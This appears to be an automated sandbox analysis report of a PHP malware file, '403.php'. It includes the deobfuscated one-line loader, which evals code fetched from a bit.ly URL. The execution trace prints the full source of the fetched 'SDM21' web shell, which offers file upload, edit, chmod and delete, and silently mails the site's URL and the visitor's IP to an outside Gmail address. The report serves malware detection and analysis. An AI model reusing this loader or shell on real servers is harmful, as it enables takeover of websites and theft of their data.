PHP Malware Analysis
403.php
md5: 4fd8d49b83340797a7ba2955e93324a9
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- jakbarsec@gmail.com (Traces)
Environment
Execution
- eval (Deobfuscated, Traces)
Files
- copy (Traces)
- file_get_contents (Deobfuscated, Traces)
Input
URLs
- http://localhost/uploads/403.php (Traces)
- https://bit.ly/3iLHOKD (Deobfuscated, Original, Traces)
- https://fonts.googleapis.com/css?family=Kelly+Slab (HTML, Traces)
- https://i.ibb.co/M1JCKDN/images-jpeg.jpg (HTML, Traces)
- https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css (HTML, Traces)
- https://wallpaper.sc/id/applewatch/wp-content/uploads/2018/08/applewatch-312x390-photoface-wallpaper_01348-312x312.jpg (HTML, Traces)
Deobfuscated PHP code
<?php
echo null;
/********/
/*******/
/********/
@eval("?>" . file_get_contents("https://bit.ly/3iLHOKD"));
/**/Execution traces
data/traces/4fd8d49b83340797a7ba2955e93324a9_trace-1676254471.233.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:14:57.130859]
1 0 1 0.000173 393512
1 3 0 0.000233 393776 {main} 1 /var/www/html/uploads/403.php 0 0
2 4 0 0.000254 393776 file_get_contents 0 /var/www/html/uploads/403.php 1 1 'https://bit.ly/3iLHOKD'
2 4 1 0.195984 413064
2 4 R ' <?php\r\n// --- Create by SDM21\r\n// --- php shell \r\n\r\nerror_reporting(0); \r\nsession_start();\r\n\r\nif(get_magic_quotes_gpc()){\r\nforeach($_POST as $key=>$value){\r\n$_POST[$key] = stripslashes($value);\r\n}\r\n}\r\n\r\necho \'<!DOCTYPE HTML>\r\n<HTML>\r\n<HEAD>\r\n<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css">\r\n<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css"/>\r\n<link'
2 5 0 0.196476 480992 eval 1 '?> <?php\r\n// --- Create by SDM21\r\n// --- php shell \r\n\r\nerror_reporting(0); \r\nsession_start();\r\n\r\nif(get_magic_quotes_gpc()){\r\nforeach($_POST as $key=>$value){\r\n$_POST[$key] = stripslashes($value);\r\n}\r\n}\r\n\r\necho \'<!DOCTYPE HTML>\r\n<HTML>\r\n<HEAD>\r\n<link href="https://fonts.googleapis.com/css?family=Kelly+Slab" rel="stylesheet" type="text/css">\r\n<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css"/>\r\n<link rel="icon" type="image/jpg" href="https://i.ibb.co/M1JCKDN/images-jpeg.jpg"/>\r\n<title></title>\r\n<center>\r\n\r\n<style type="text/css">\r\nbody {\r\n\tfont-family: Kelly Slab;\r\n\tbackground-color: black;\r\n\tcolor: white;\r\n\t}\r\n#content tr:hover{\r\n\tbackground-color: #0200FF;\r\n\ttext-shadow:0px 0px 10px #339900;\r\n\t}\r\n#content .first{\r\n\tcolor: #000000;\r\n\tbackground-image:url(https://wallpaper.sc/id/applewatch/wp-content/uploads/2018/08/applewatch-312x390-photoface-wallpaper_01348-312x312.jpg);\r\n\t}\r\n#content .first:hover{\r\n\tbackground-color: grey;\r\n\ttext-shadow:0px 0px 1px #339900;\r\n\t}\r\ntable, th, td {\r\n\t\tborder-collapse:collapse;\r\n\t\tpadding: 5px;\r\n\t\tcolor: white;\r\n\t\t}\r\n.table_home, .th_home, .td_home { \r\n\t\tcolor:grey;\r\n\t\tborder: 2px solid grey;\r\n\t\tpadding: 7px;\r\n\t\t}\r\na{\r\n\tfont-size: 19px;\r\n\tcolor: #ffffff;\r\n\ttext-decoration: none;\r\n\t}\r\na:hover{\r\n\tcolor: white;\r\n\ttext-shadow:0px 0px 10px #339900;\r\n\t}\r\ninput,select,textarea{\r\n\tborder: 1px #ffffff solid;\r\n\t-moz-border-radius: 5px;\r\n\t-webkit-border-radius:5px;\r\n\tborder-radius:5px;\r\n\t}\r\n.close {\r\n\toverflow: auto;\r\n\tborder: 1px solid red;\r\n\tbackground: red;\r\n\tcolor: white;\r\n\t}\r\n.r {\r\n\tfloat: right;\r\n\ttext-align: right;\r\n\t}\r\n</style>\r\n\r\n<a href="?"><h1 style="font-family: Kelly Slab; font-size: 35px; color: white;">\r\nSDM21 SHELL</h1></a>\r\n</HEAD>\r\n<BODY>\r\n\r\n<table width="95%" border="0" cellpadding="0" cellspacing="0" align="left">\r\n<tr><td>\';\r\necho "<tr><td><font color=\'white\'>\r\n<i class=\'fa fa-user\'></i> <td>: <font color=\'lime\'>".$_SERVER[\'REMOTE_ADDR\']."<tr><td><font color=\'white\'>\r\n<i class=\'fa fa-desktop\'></i> <td>: <font color=\'lime\'>".gethostbyname($_SERVER[\'HTTP_HOST\'])." / ".$_SERVER[\'SERVER_NAME\']."<tr><td><font color=\'white\'>\r\n<i class=\'fa fa-hdd-o\'></i> <td>: <font color=\'lime\'>".php_uname()."</font></tr></td></table>";\r\n\r\necho \'<table width="95%" border="0" cellpadding="0" cellspacing="0" align="center">\r\n<tr align="center"><td align="center"><br>\';\r\n\r\nif(isset($_GET[\'path\'])){\r\n$path = $_GET[\'path\'];\r\n}else{\r\n$path = getcwd();\r\n}\r\n$path = str_replace(\'\\\\\',\'/\',$path);\r\n$paths = explode(\'/\',$path);\r\n\r\nforeach($paths as $id=>$pat){\r\nif($pat == \'\' && $id == 0){\r\n$a = true;\r\necho \'<i class="fa fa-folder-o"></i> : <a href="?path=/">/</a>\';\r\ncontinue;\r\n}\r\nif($pat == \'\') continue;\r\necho \'<a href="?path=\';\r\nfor($i=0;$i<=$id;$i++){\r\necho "$paths[$i]";\r\nif($i != $id) echo "/";\r\n}\r\necho \'">\'.$pat.\'</a>/\';\r\n}\r\n\r\n\r\n//upload\r\necho \'<br><br><br><font color="yellow"><form enctype="multipart/form-data" method="POST">\r\nUpload File: <input type="file" name="file" style="color:cyan;border:2px solid red;" required/></font>\r\n<input type="submit" value="UPLOAD" style="margin-top:4px;width:100px;height:27px;font-family:Kelly Slab;font-size:15;background:black;color: yellow;border:2px solid red;border-radius:5px"/>\';\r\nif(isset($_FILES[\'file\'])){\r\nif(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){\r\necho \'<br><br><font color="lime">UPLOAD SUCCES !!!!</font><br/>\';\r\n}else{\r\necho \'<script>alert("File Gagal Diupload !!")</script>\';\r\n}\r\n}\r\n\r\necho \'</form></td></tr>\';\r\nif(isset($_GET[\'filesrc\'])){\r\necho "<tr><td>files >> ";\r\necho $_GET[\'filesrc\'];\r\necho \'</tr></td></table><br />\';\r\necho(\' <textarea style="font-size: 8px; border: 1px solid white; background-color: black; color: white; width: 100%;height: 1200px;" readonly> \'.htmlspecialchars(file_get_contents($_GET[\'filesrc\'])).\'</textarea>\');\r\n}elseif(isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\'){\r\necho \'</table><br /><center>\'.$_POST[\'path\'].\'<br /><br />\';\r\n\r\n//Chmod\r\nif($_POST[\'opt\'] == \'chmod\'){\r\nif(isset($_POST[\'perm\'])){\r\nif(chmod($_POST[\'path\'],$_POST[\'perm\'])){\r\necho \'<br><br><font color="lime">CHANGE PERMISSION SUCCESS !!</font><br/>\';\r\n}else{\r\necho \'<script>alert("Change Permission Gagal !!")</script>\';\r\n}\r\n}\r\necho \'<form method="POST">\r\nPermission : <input name="perm" type="text" size="4" value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'path\'])), -4).\'" style="width:80px; height: 30px;"/>\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="chmod">\r\n<input type="submit" value="Lanjut" style="width:60px; height: 30px;"/>\r\n</form>\';\r\n}\r\n\r\n//rename folder\r\nelseif($_GET[\'opt\'] == \'btw\'){\r\n\t$cwd = getcwd();\r\n\t echo \'<form action="?option&path=\'.$cwd.\'&opt=delete&type=buat" method="POST">\r\nNew Name : <input name="name" type="text" size="25" value="Folder" style="width:300px; height: 30px;"/>\r\n<input type="hidden" name="path" value="\'.$cwd.\'">\r\n<input type="hidden" name="opt" value="delete">\r\n<input type="submit" value="Go" style="width:100px; height: 30px;"/>\r\n</form>\';\r\n}\r\n\r\n//rename file\r\nelseif($_POST[\'opt\'] == \'rename\'){\r\nif(isset($_POST[\'newname\'])){\r\nif(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){\r\necho \'<br><br><font color="lime">CHANGE NAME SUCCESS !!</font><br/>\';\r\n}else{\r\necho \'<script>alert("Change Name Gagal !!")</script>\';\r\n}\r\n$_POST[\'name\'] = $_POST[\'newname\'];\r\n}\r\necho \'<form method="POST">\r\nNew Name : <input name="newname" type="text" size="5" style="width:20%; height:30px;" value="\'.$_POST[\'name\'].\'" />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="rename">\r\n<input type="submit" value="Lanjut" style="height:30px;" />\r\n</form>\';\r\n}\r\n\r\n//edit file\r\nelseif($_POST[\'opt\'] == \'edit\'){\r\nif(isset($_POST[\'src\'])){\r\n$fp = fopen($_POST[\'path\'],\'w\');\r\nif(fwrite($fp,$_POST[\'src\'])){\r\necho \'<br><br><font color="lime">EDIT FILE SUCCESS !!</font><br/>\';\r\n}else{\r\necho \'<script>alert("Edit File Gagal !!")</script>\';\r\n}\r\nfclose($fp);\r\n}\r\necho \'<form method="POST">\r\n<textarea cols=80 rows=20 name="src" style="font-size: 8px; border: 1px solid white; background-color: black; color: white; width: 100%;height: 1000px;">\'.htmlspecialchars(file_get_contents($_POST[\'path\'])).\'</textarea><br />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="edit">\r\n<input type="submit" value="Lanjut" style="height:30px; width:70px;"/>\r\n</form>\';\r\n}\r\necho \'</center>\';\r\n}else{\r\necho \'</table><br /><center>\';\r\n\r\n//delete dir\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\'){\r\nif($_POST[\'type\'] == \'dir\'){\r\nif(rmdir($_POST[\'path\'])){\r\necho \'<br><br><font color="lime">DELETE DIR SUCCESS !!</font><br/>\';\r\n}else{\r\necho \'<script>alert("Delete Dir Gagal !!")</script>>\';\r\n}\r\n}\r\n\r\n//delete file\r\nelseif($_POST[\'type\'] == \'file\'){\r\nif(unlink($_POST[\'path\'])){\r\necho \'<br><br><font color="lime">DELETE FILE SUCCESS !!</font><br/>\';\r\n}else{\r\necho \'<script>alert("Delete File Gagal !!")</script>\';\r\n}\r\n}\r\n}\r\n\r\n?>\r\n<?php\r\n@ini_set(\'output_buffering\', 0);\r\n@ini_set(\'display_errors\', 0);\r\nset_time_limit(0);\r\nini_set(\'memory_limit\', \'64M\');\r\nheader(\'Content-Type: text/html; charset=UTF-8\');\r\n$tujuanmail = \'jakbarsec@gmail.com\';\r\n$x_path = "http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'REQUEST_URI\'];\r\n$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER[\'REMOTE_ADDR\'] . " ]";\r\nmail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER[\'REMOTE_ADDR\'] . " ]");\r\n?>\r\n<?php\r\necho \'</center>\';\r\n$scandir = scandir($path);\r\n$pa = getcwd();\r\necho \'<div id="content"><table width="95%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">\r\n<tr class="first">\r\n<th><center>Name</center></th>\r\n<th><center>Size</center></th>\r\n<th><center>Perm</center></th>\r\n<th><center>Options</center></th>\r\n</tr>\r\n<tr>\';\r\n\r\nforeach($scandir as $dir){\r\nif(!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\') continue;\r\necho "<tr>\r\n<td class=td_home><img src=\'data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=\'><a href=\\"?path=$path/$dir\\"> $dir</a></td>\r\n<td class=td_home><center>DIR</center></td>\r\n<td class=td_home><center>";\r\nif(is_writable("$path/$dir")) echo \'<font color="#57FF00">\';\r\nelseif(!is_readable("$path/$dir")) echo \'<font color="#FF0004">\';\r\necho perms("$path/$dir");\r\nif(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo \'</font>\';\r\n\r\necho "</center></td>\r\n<td class=td_home><center><form method=\\"POST\\" action=\\"?option&path=$path\\">\r\n<select name=\\"opt\\" style=\\"margin-top:6px;width:100px;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px\\">\r\n<option value=\\"Action\\">Action</option>\r\n<option value=\\"delete\\">Delete</option>\r\n<option value=\\"chmod\\">Chmod</option>\r\n<option value=\\"rename\\">Rename</option>\r\n</select>\r\n<input type=\\"hidden\\" name=\\"type\\" value=\\"dir\\">\r\n<input type=\\"hidden\\" name=\\"name\\" value=\\"$dir\\">\r\n<input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$dir\\">\r\n<input type=\\"submit\\" value=\\">\\" style=\\"margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px\\"/>\r\n</form></center></td>\r\n</tr>";\r\n}\r\n\r\necho \'<tr class="first"><td></td><td></td><td></td><td></td></tr>\';\r\nforeach($scandir as $file){\r\nif(!is_file("$path/$file")) continue;\r\n$size = filesize("$path/$file")/1024;\r\n$size = round($size,3);\r\nif($size >= 1024){\r\n$size = round($size/1024,2).\' MB\';\r\n}else{\r\n$size = $size.\' KB\';\r\n}\r\n\r\necho "<tr>\r\n<td class=td_home><img src=\'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=\'><a href=\\"?filesrc=$path/$file&path=$path\\"> $file</a></td>\r\n<td class=td_home><center>".$size."</center></td>\r\n<td class=td_home><center>";\r\nif(is_writable("$path/$file")) echo \'<font color="#57FF00">\';\r\nelseif(!is_readable("$path/$file")) echo \'<font color="#FF0004">\';\r\necho perms("$path/$file");\r\nif(is_writable("$path/$file") || !is_readable("$path/$file")) echo \'</font>\';\r\n\r\necho "</center></td>\r\n<td class=td_home><center><form method=\\"POST\\" action=\\"?option&path=$path\\">\r\n<select name=\\"opt\\" style=\\"margin-top:6px;width:100px;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px\\">\r\n<option value=\\"Action\\">Action</option>\r\n<option value=\\"delete\\">SDM Hapus</option>\r\n<option value=\\"edit\\">SDM Edit</option>\r\n<option value=\\"rename\\">SDM Ganti Nama</option>\r\n<option value=\\"chmod\\">SDM Chmod</option>\r\n</select>\r\n<input type=\\"hidden\\" name=\\"type\\" value=\\"file\\">\r\n<input type=\\"hidden\\" name=\\"name\\" value=\\"$file\\">\r\n<input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$file\\">\r\n<input type=\\"submit\\" value=\\">\\" style=\\"margin-top:6px;width:27;font-family:Kelly Slab;font-size:15;background:black;color:aqua;border:2px solid aqua;border-radius:5px\\"/>\r\n</form></center></td>\r\n</tr>";\r\n}\r\n\r\necho \'</table>\r\n</div>\';\r\n}\r\n\r\nfunction perms($file){\r\n$perms = fileperms($file);\r\n\r\nif (($perms & 0xC000) == 0xC000) {\r\n// Socket\r\n$info = \'s\';\r\n} elseif (($perms & 0xA000) == 0xA000) {\r\n// Symbolic Link\r\n$info = \'l\';\r\n} elseif (($perms & 0x8000) == 0x8000) {\r\n// Regular\r\n$info = \'-\';\r\n} elseif (($perms & 0x6000) == 0x6000) {\r\n// Block special\r\n$info = \'b\';\r\n} elseif (($perms & 0x4000) == 0x4000) {\r\n// Directory\r\n$info = \'d\';\r\n} elseif (($perms & 0x2000) == 0x2000) {\r\n// Character special\r\n$info = \'c\';\r\n} elseif (($perms & 0x1000) == 0x1000) {\r\n// FIFO pipe\r\n$info = \'p\';\r\n} else {\r\n// Unknown\r\n$info = \'u\';\r\n}\r\n\r\n// Owner\r\n$info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0040) ?\r\n(($perms & 0x0800) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0800) ? \'S\' : \'-\'));\r\n\r\n// Group\r\n$info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0008) ?\r\n(($perms & 0x0400) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0400) ? \'S\' : \'-\'));\r\n\r\n// World\r\n$info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0001) ?\r\n(($perms & 0x0200) ? \'t\' : \'x\' ) :\r\n(($perms & 0x0200) ? \'T\' : \'-\'));\r\n\r\nreturn $info;\r\n}\r\n?>\r\n<center>\r\n<br>\r\n<font size="2px" color="white">Copyright © <script type=\'text/javascript\'>var creditsyear = new Date();document.write(creditsyear.getFullYear()); </script> SDM21. All Right Reserved.</font>\r\n</center>\r\n</BODY>\r\n</HTML>' /var/www/html/uploads/403.php 1 0
3 6 0 0.196802 480992 error_reporting 0 /var/www/html/uploads/403.php(1) : eval()'d code 5 1 0
3 6 1 0.196820 481032
3 6 R 0
3 7 0 0.196846 480992 session_start 0 /var/www/html/uploads/403.php(1) : eval()'d code 6 0
3 7 1 0.196911 481744
3 7 R TRUE
3 8 0 0.196927 481744 get_magic_quotes_gpc 0 /var/www/html/uploads/403.php(1) : eval()'d code 8 0
3 8 1 0.196940 481744
3 8 R FALSE
3 9 0 0.196955 481968 gethostbyname 0 /var/www/html/uploads/403.php(1) : eval()'d code 87 1 'localhost'
3 9 1 0.196991 482048
3 9 R '127.0.0.1'
3 10 0 0.197007 482064 php_uname 0 /var/www/html/uploads/403.php(1) : eval()'d code 88 0
3 10 1 0.197022 482176
3 10 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
3 11 0 0.197041 481744 getcwd 0 /var/www/html/uploads/403.php(1) : eval()'d code 96 0
3 11 1 0.197056 481792
3 11 R '/var/www/html/uploads'
2 A /var/www/html/uploads/403.php(1) : eval()'d code 96 $path = '/var/www/html/uploads'
3 12 0 0.197083 481792 str_replace 0 /var/www/html/uploads/403.php(1) : eval()'d code 98 3 '\\' '/' '/var/www/html/uploads'
3 12 1 0.197099 481888
3 12 R '/var/www/html/uploads'
2 A /var/www/html/uploads/403.php(1) : eval()'d code 98 $path = '/var/www/html/uploads'
3 13 0 0.197123 481792 explode 0 /var/www/html/uploads/403.php(1) : eval()'d code 99 2 '/' '/var/www/html/uploads'
3 13 1 0.197138 482368
3 13 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/403.php(1) : eval()'d code 99 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/403.php(1) : eval()'d code 101 $id = 0
2 A /var/www/html/uploads/403.php(1) : eval()'d code 103 $a = TRUE
2 A /var/www/html/uploads/403.php(1) : eval()'d code 101 $id = 1
2 A /var/www/html/uploads/403.php(1) : eval()'d code 109 $i = 0
2 A /var/www/html/uploads/403.php(1) : eval()'d code 109 $i++
2 A /var/www/html/uploads/403.php(1) : eval()'d code 109 $i++
2 A /var/www/html/uploads/403.php(1) : eval()'d code 101 $id = 2
2 A /var/www/html/uploads/403.php(1) : eval()'d code 109 $i = 0
2 A /var/www/html/uploads/403.php(1) : eval()'d code 109 $i++
2 A /var/www/html/uploads/403.php(1) : eval()'d code 109 $i++
2 A /var/www/html/uploads/403.php(1) : eval()'d code 109 $i++
2 A /var/www/html/uploads/403.php(1) : eval()'d code 101 $id = 3
2 A /var/www/html/uploads/403.php(1) : eval()'d code 109 $i = 0
2 A /var/www/html/uploads/403.php(1) : eval()'d code 109 $i++
2 A /var/www/html/uploads/403.php(1) : eval()'d code 109 $i++
2 A /var/www/html/uploads/403.php(1) : eval()'d code 109 $i++
2 A /var/www/html/uploads/403.php(1) : eval()'d code 109 $i++
2 A /var/www/html/uploads/403.php(1) : eval()'d code 101 $id = 4
2 A /var/www/html/uploads/403.php(1) : eval()'d code 109 $i = 0
2 A /var/www/html/uploads/403.php(1) : eval()'d code 109 $i++
2 A /var/www/html/uploads/403.php(1) : eval()'d code 109 $i++
2 A /var/www/html/uploads/403.php(1) : eval()'d code 109 $i++
2 A /var/www/html/uploads/403.php(1) : eval()'d code 109 $i++
2 A /var/www/html/uploads/403.php(1) : eval()'d code 109 $i++
3 14 0 0.197430 482296 ini_set 0 /var/www/html/uploads/403.php(1) : eval()'d code 228 2 'output_buffering' 0
3 14 1 0.197447 482368
3 14 R FALSE
3 15 0 0.197460 482296 ini_set 0 /var/www/html/uploads/403.php(1) : eval()'d code 229 2 'display_errors' 0
3 15 1 0.197475 482368
3 15 R ''
3 16 0 0.197488 482296 set_time_limit 0 /var/www/html/uploads/403.php(1) : eval()'d code 230 1 0
3 16 1 0.197504 482360
3 16 R FALSE
3 17 0 0.197517 482328 ini_set 0 /var/www/html/uploads/403.php(1) : eval()'d code 231 2 'memory_limit' '64M'
3 17 1 0.197531 482432
3 17 R '128M'
3 18 0 0.197544 482328 header 0 /var/www/html/uploads/403.php(1) : eval()'d code 232 1 'Content-Type: text/html; charset=UTF-8'
3 18 1 0.197561 482504
3 18 R NULL
2 A /var/www/html/uploads/403.php(1) : eval()'d code 233 $tujuanmail = 'jakbarsec@gmail.com'
2 A /var/www/html/uploads/403.php(1) : eval()'d code 234 $x_path = 'http://localhost/uploads/403.php'
2 A /var/www/html/uploads/403.php(1) : eval()'d code 235 $pesan_alert = 'fix http://localhost/uploads/403.php :p *IP Address : [ 127.0.0.1 ]'
3 19 0 0.197613 482672 mail 0 /var/www/html/uploads/403.php(1) : eval()'d code 236 4 'jakbarsec@gmail.com' 'LOGGER' 'fix http://localhost/uploads/403.php :p *IP Address : [ 127.0.0.1 ]' '[ 127.0.0.1 ]'
3 19 1 0.198609 482816
3 19 R FALSE
3 20 0 0.198633 482632 scandir 0 /var/www/html/uploads/403.php(1) : eval()'d code 240 1 '/var/www/html/uploads'
3 20 1 0.198669 483248
3 20 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '403.php', 4 => 'data', 5 => 'prepend.php']
2 A /var/www/html/uploads/403.php(1) : eval()'d code 240 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '403.php', 4 => 'data', 5 => 'prepend.php']
3 21 0 0.198709 483216 getcwd 0 /var/www/html/uploads/403.php(1) : eval()'d code 241 0
3 21 1 0.198723 483264
3 21 R '/var/www/html/uploads'
2 A /var/www/html/uploads/403.php(1) : eval()'d code 241 $pa = '/var/www/html/uploads'
3 22 0 0.198750 483312 is_dir 0 /var/www/html/uploads/403.php(1) : eval()'d code 252 1 '/var/www/html/uploads/.'
3 22 1 0.198767 483376
3 22 R TRUE
3 23 0 0.198781 483344 is_dir 0 /var/www/html/uploads/403.php(1) : eval()'d code 252 1 '/var/www/html/uploads/..'
3 23 1 0.198796 483392
3 23 R TRUE
3 24 0 0.198809 483352 is_dir 0 /var/www/html/uploads/403.php(1) : eval()'d code 252 1 '/var/www/html/uploads/.htaccess'
3 24 1 0.198824 483392
3 24 R FALSE
3 25 0 0.198837 483352 is_dir 0 /var/www/html/uploads/403.php(1) : eval()'d code 252 1 '/var/www/html/uploads/403.php'
3 25 1 0.198852 483392
3 25 R FALSE
3 26 0 0.198865 483352 is_dir 0 /var/www/html/uploads/403.php(1) : eval()'d code 252 1 '/var/www/html/uploads/data'
3 26 1 0.198879 483392
3 26 R TRUE
3 27 0 0.198893 483352 is_writable 0 /var/www/html/uploads/403.php(1) : eval()'d code 257 1 '/var/www/html/uploads/data'
3 27 1 0.198910 483392
3 27 R TRUE
3 28 0 0.198923 483352 perms 1 /var/www/html/uploads/403.php(1) : eval()'d code 259 1 '/var/www/html/uploads/data'
4 29 0 0.198937 483352 fileperms 0 /var/www/html/uploads/403.php(1) : eval()'d code 320 1 '/var/www/html/uploads/data'
4 29 1 0.198950 483392
4 29 R 16895
3 A /var/www/html/uploads/403.php(1) : eval()'d code 320 $perms = 16895
3 A /var/www/html/uploads/403.php(1) : eval()'d code 336 $info = 'd'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 349 $info .= 'r'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 350 $info .= 'w'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 353 $info .= 'x'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 356 $info .= 'r'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 357 $info .= 'w'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 360 $info .= 'x'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 363 $info .= 'r'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 364 $info .= 'w'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 367 $info .= 'x'
3 28 1 0.199081 483392
3 28 R 'drwxrwxrwx'
3 30 0 0.199095 483352 is_writable 0 /var/www/html/uploads/403.php(1) : eval()'d code 260 1 '/var/www/html/uploads/data'
3 30 1 0.199110 483392
3 30 R TRUE
3 31 0 0.199130 483328 is_dir 0 /var/www/html/uploads/403.php(1) : eval()'d code 252 1 '/var/www/html/uploads/prepend.php'
3 31 1 0.199146 483376
3 31 R FALSE
3 32 0 0.199160 483320 is_file 0 /var/www/html/uploads/403.php(1) : eval()'d code 280 1 '/var/www/html/uploads/.'
3 32 1 0.199175 483344
3 32 R FALSE
3 33 0 0.199188 483312 is_file 0 /var/www/html/uploads/403.php(1) : eval()'d code 280 1 '/var/www/html/uploads/..'
3 33 1 0.199202 483360
3 33 R FALSE
3 34 0 0.199215 483320 is_file 0 /var/www/html/uploads/403.php(1) : eval()'d code 280 1 '/var/www/html/uploads/.htaccess'
3 34 1 0.199229 483360
3 34 R TRUE
3 35 0 0.199242 483320 filesize 0 /var/www/html/uploads/403.php(1) : eval()'d code 281 1 '/var/www/html/uploads/.htaccess'
3 35 1 0.199255 483360
3 35 R 64
2 A /var/www/html/uploads/403.php(1) : eval()'d code 281 $size = 0.0625
3 36 0 0.199278 483264 round 0 /var/www/html/uploads/403.php(1) : eval()'d code 282 2 0.0625 3
3 36 1 0.199292 483336
3 36 R 0.063
2 A /var/www/html/uploads/403.php(1) : eval()'d code 282 $size = 0.063
2 A /var/www/html/uploads/403.php(1) : eval()'d code 286 $size = '0.063 KB'
3 37 0 0.199328 483360 is_writable 0 /var/www/html/uploads/403.php(1) : eval()'d code 293 1 '/var/www/html/uploads/.htaccess'
3 37 1 0.199344 483400
3 37 R FALSE
3 38 0 0.199356 483360 is_readable 0 /var/www/html/uploads/403.php(1) : eval()'d code 294 1 '/var/www/html/uploads/.htaccess'
3 38 1 0.199371 483400
3 38 R TRUE
3 39 0 0.199384 483360 perms 1 /var/www/html/uploads/403.php(1) : eval()'d code 295 1 '/var/www/html/uploads/.htaccess'
4 40 0 0.199397 483360 fileperms 0 /var/www/html/uploads/403.php(1) : eval()'d code 320 1 '/var/www/html/uploads/.htaccess'
4 40 1 0.199410 483400
4 40 R 33188
3 A /var/www/html/uploads/403.php(1) : eval()'d code 320 $perms = 33188
3 A /var/www/html/uploads/403.php(1) : eval()'d code 330 $info = '-'
3 A /var/www/html/uploads/403.php(1) : eval()'d code 349 $info .= 'r'
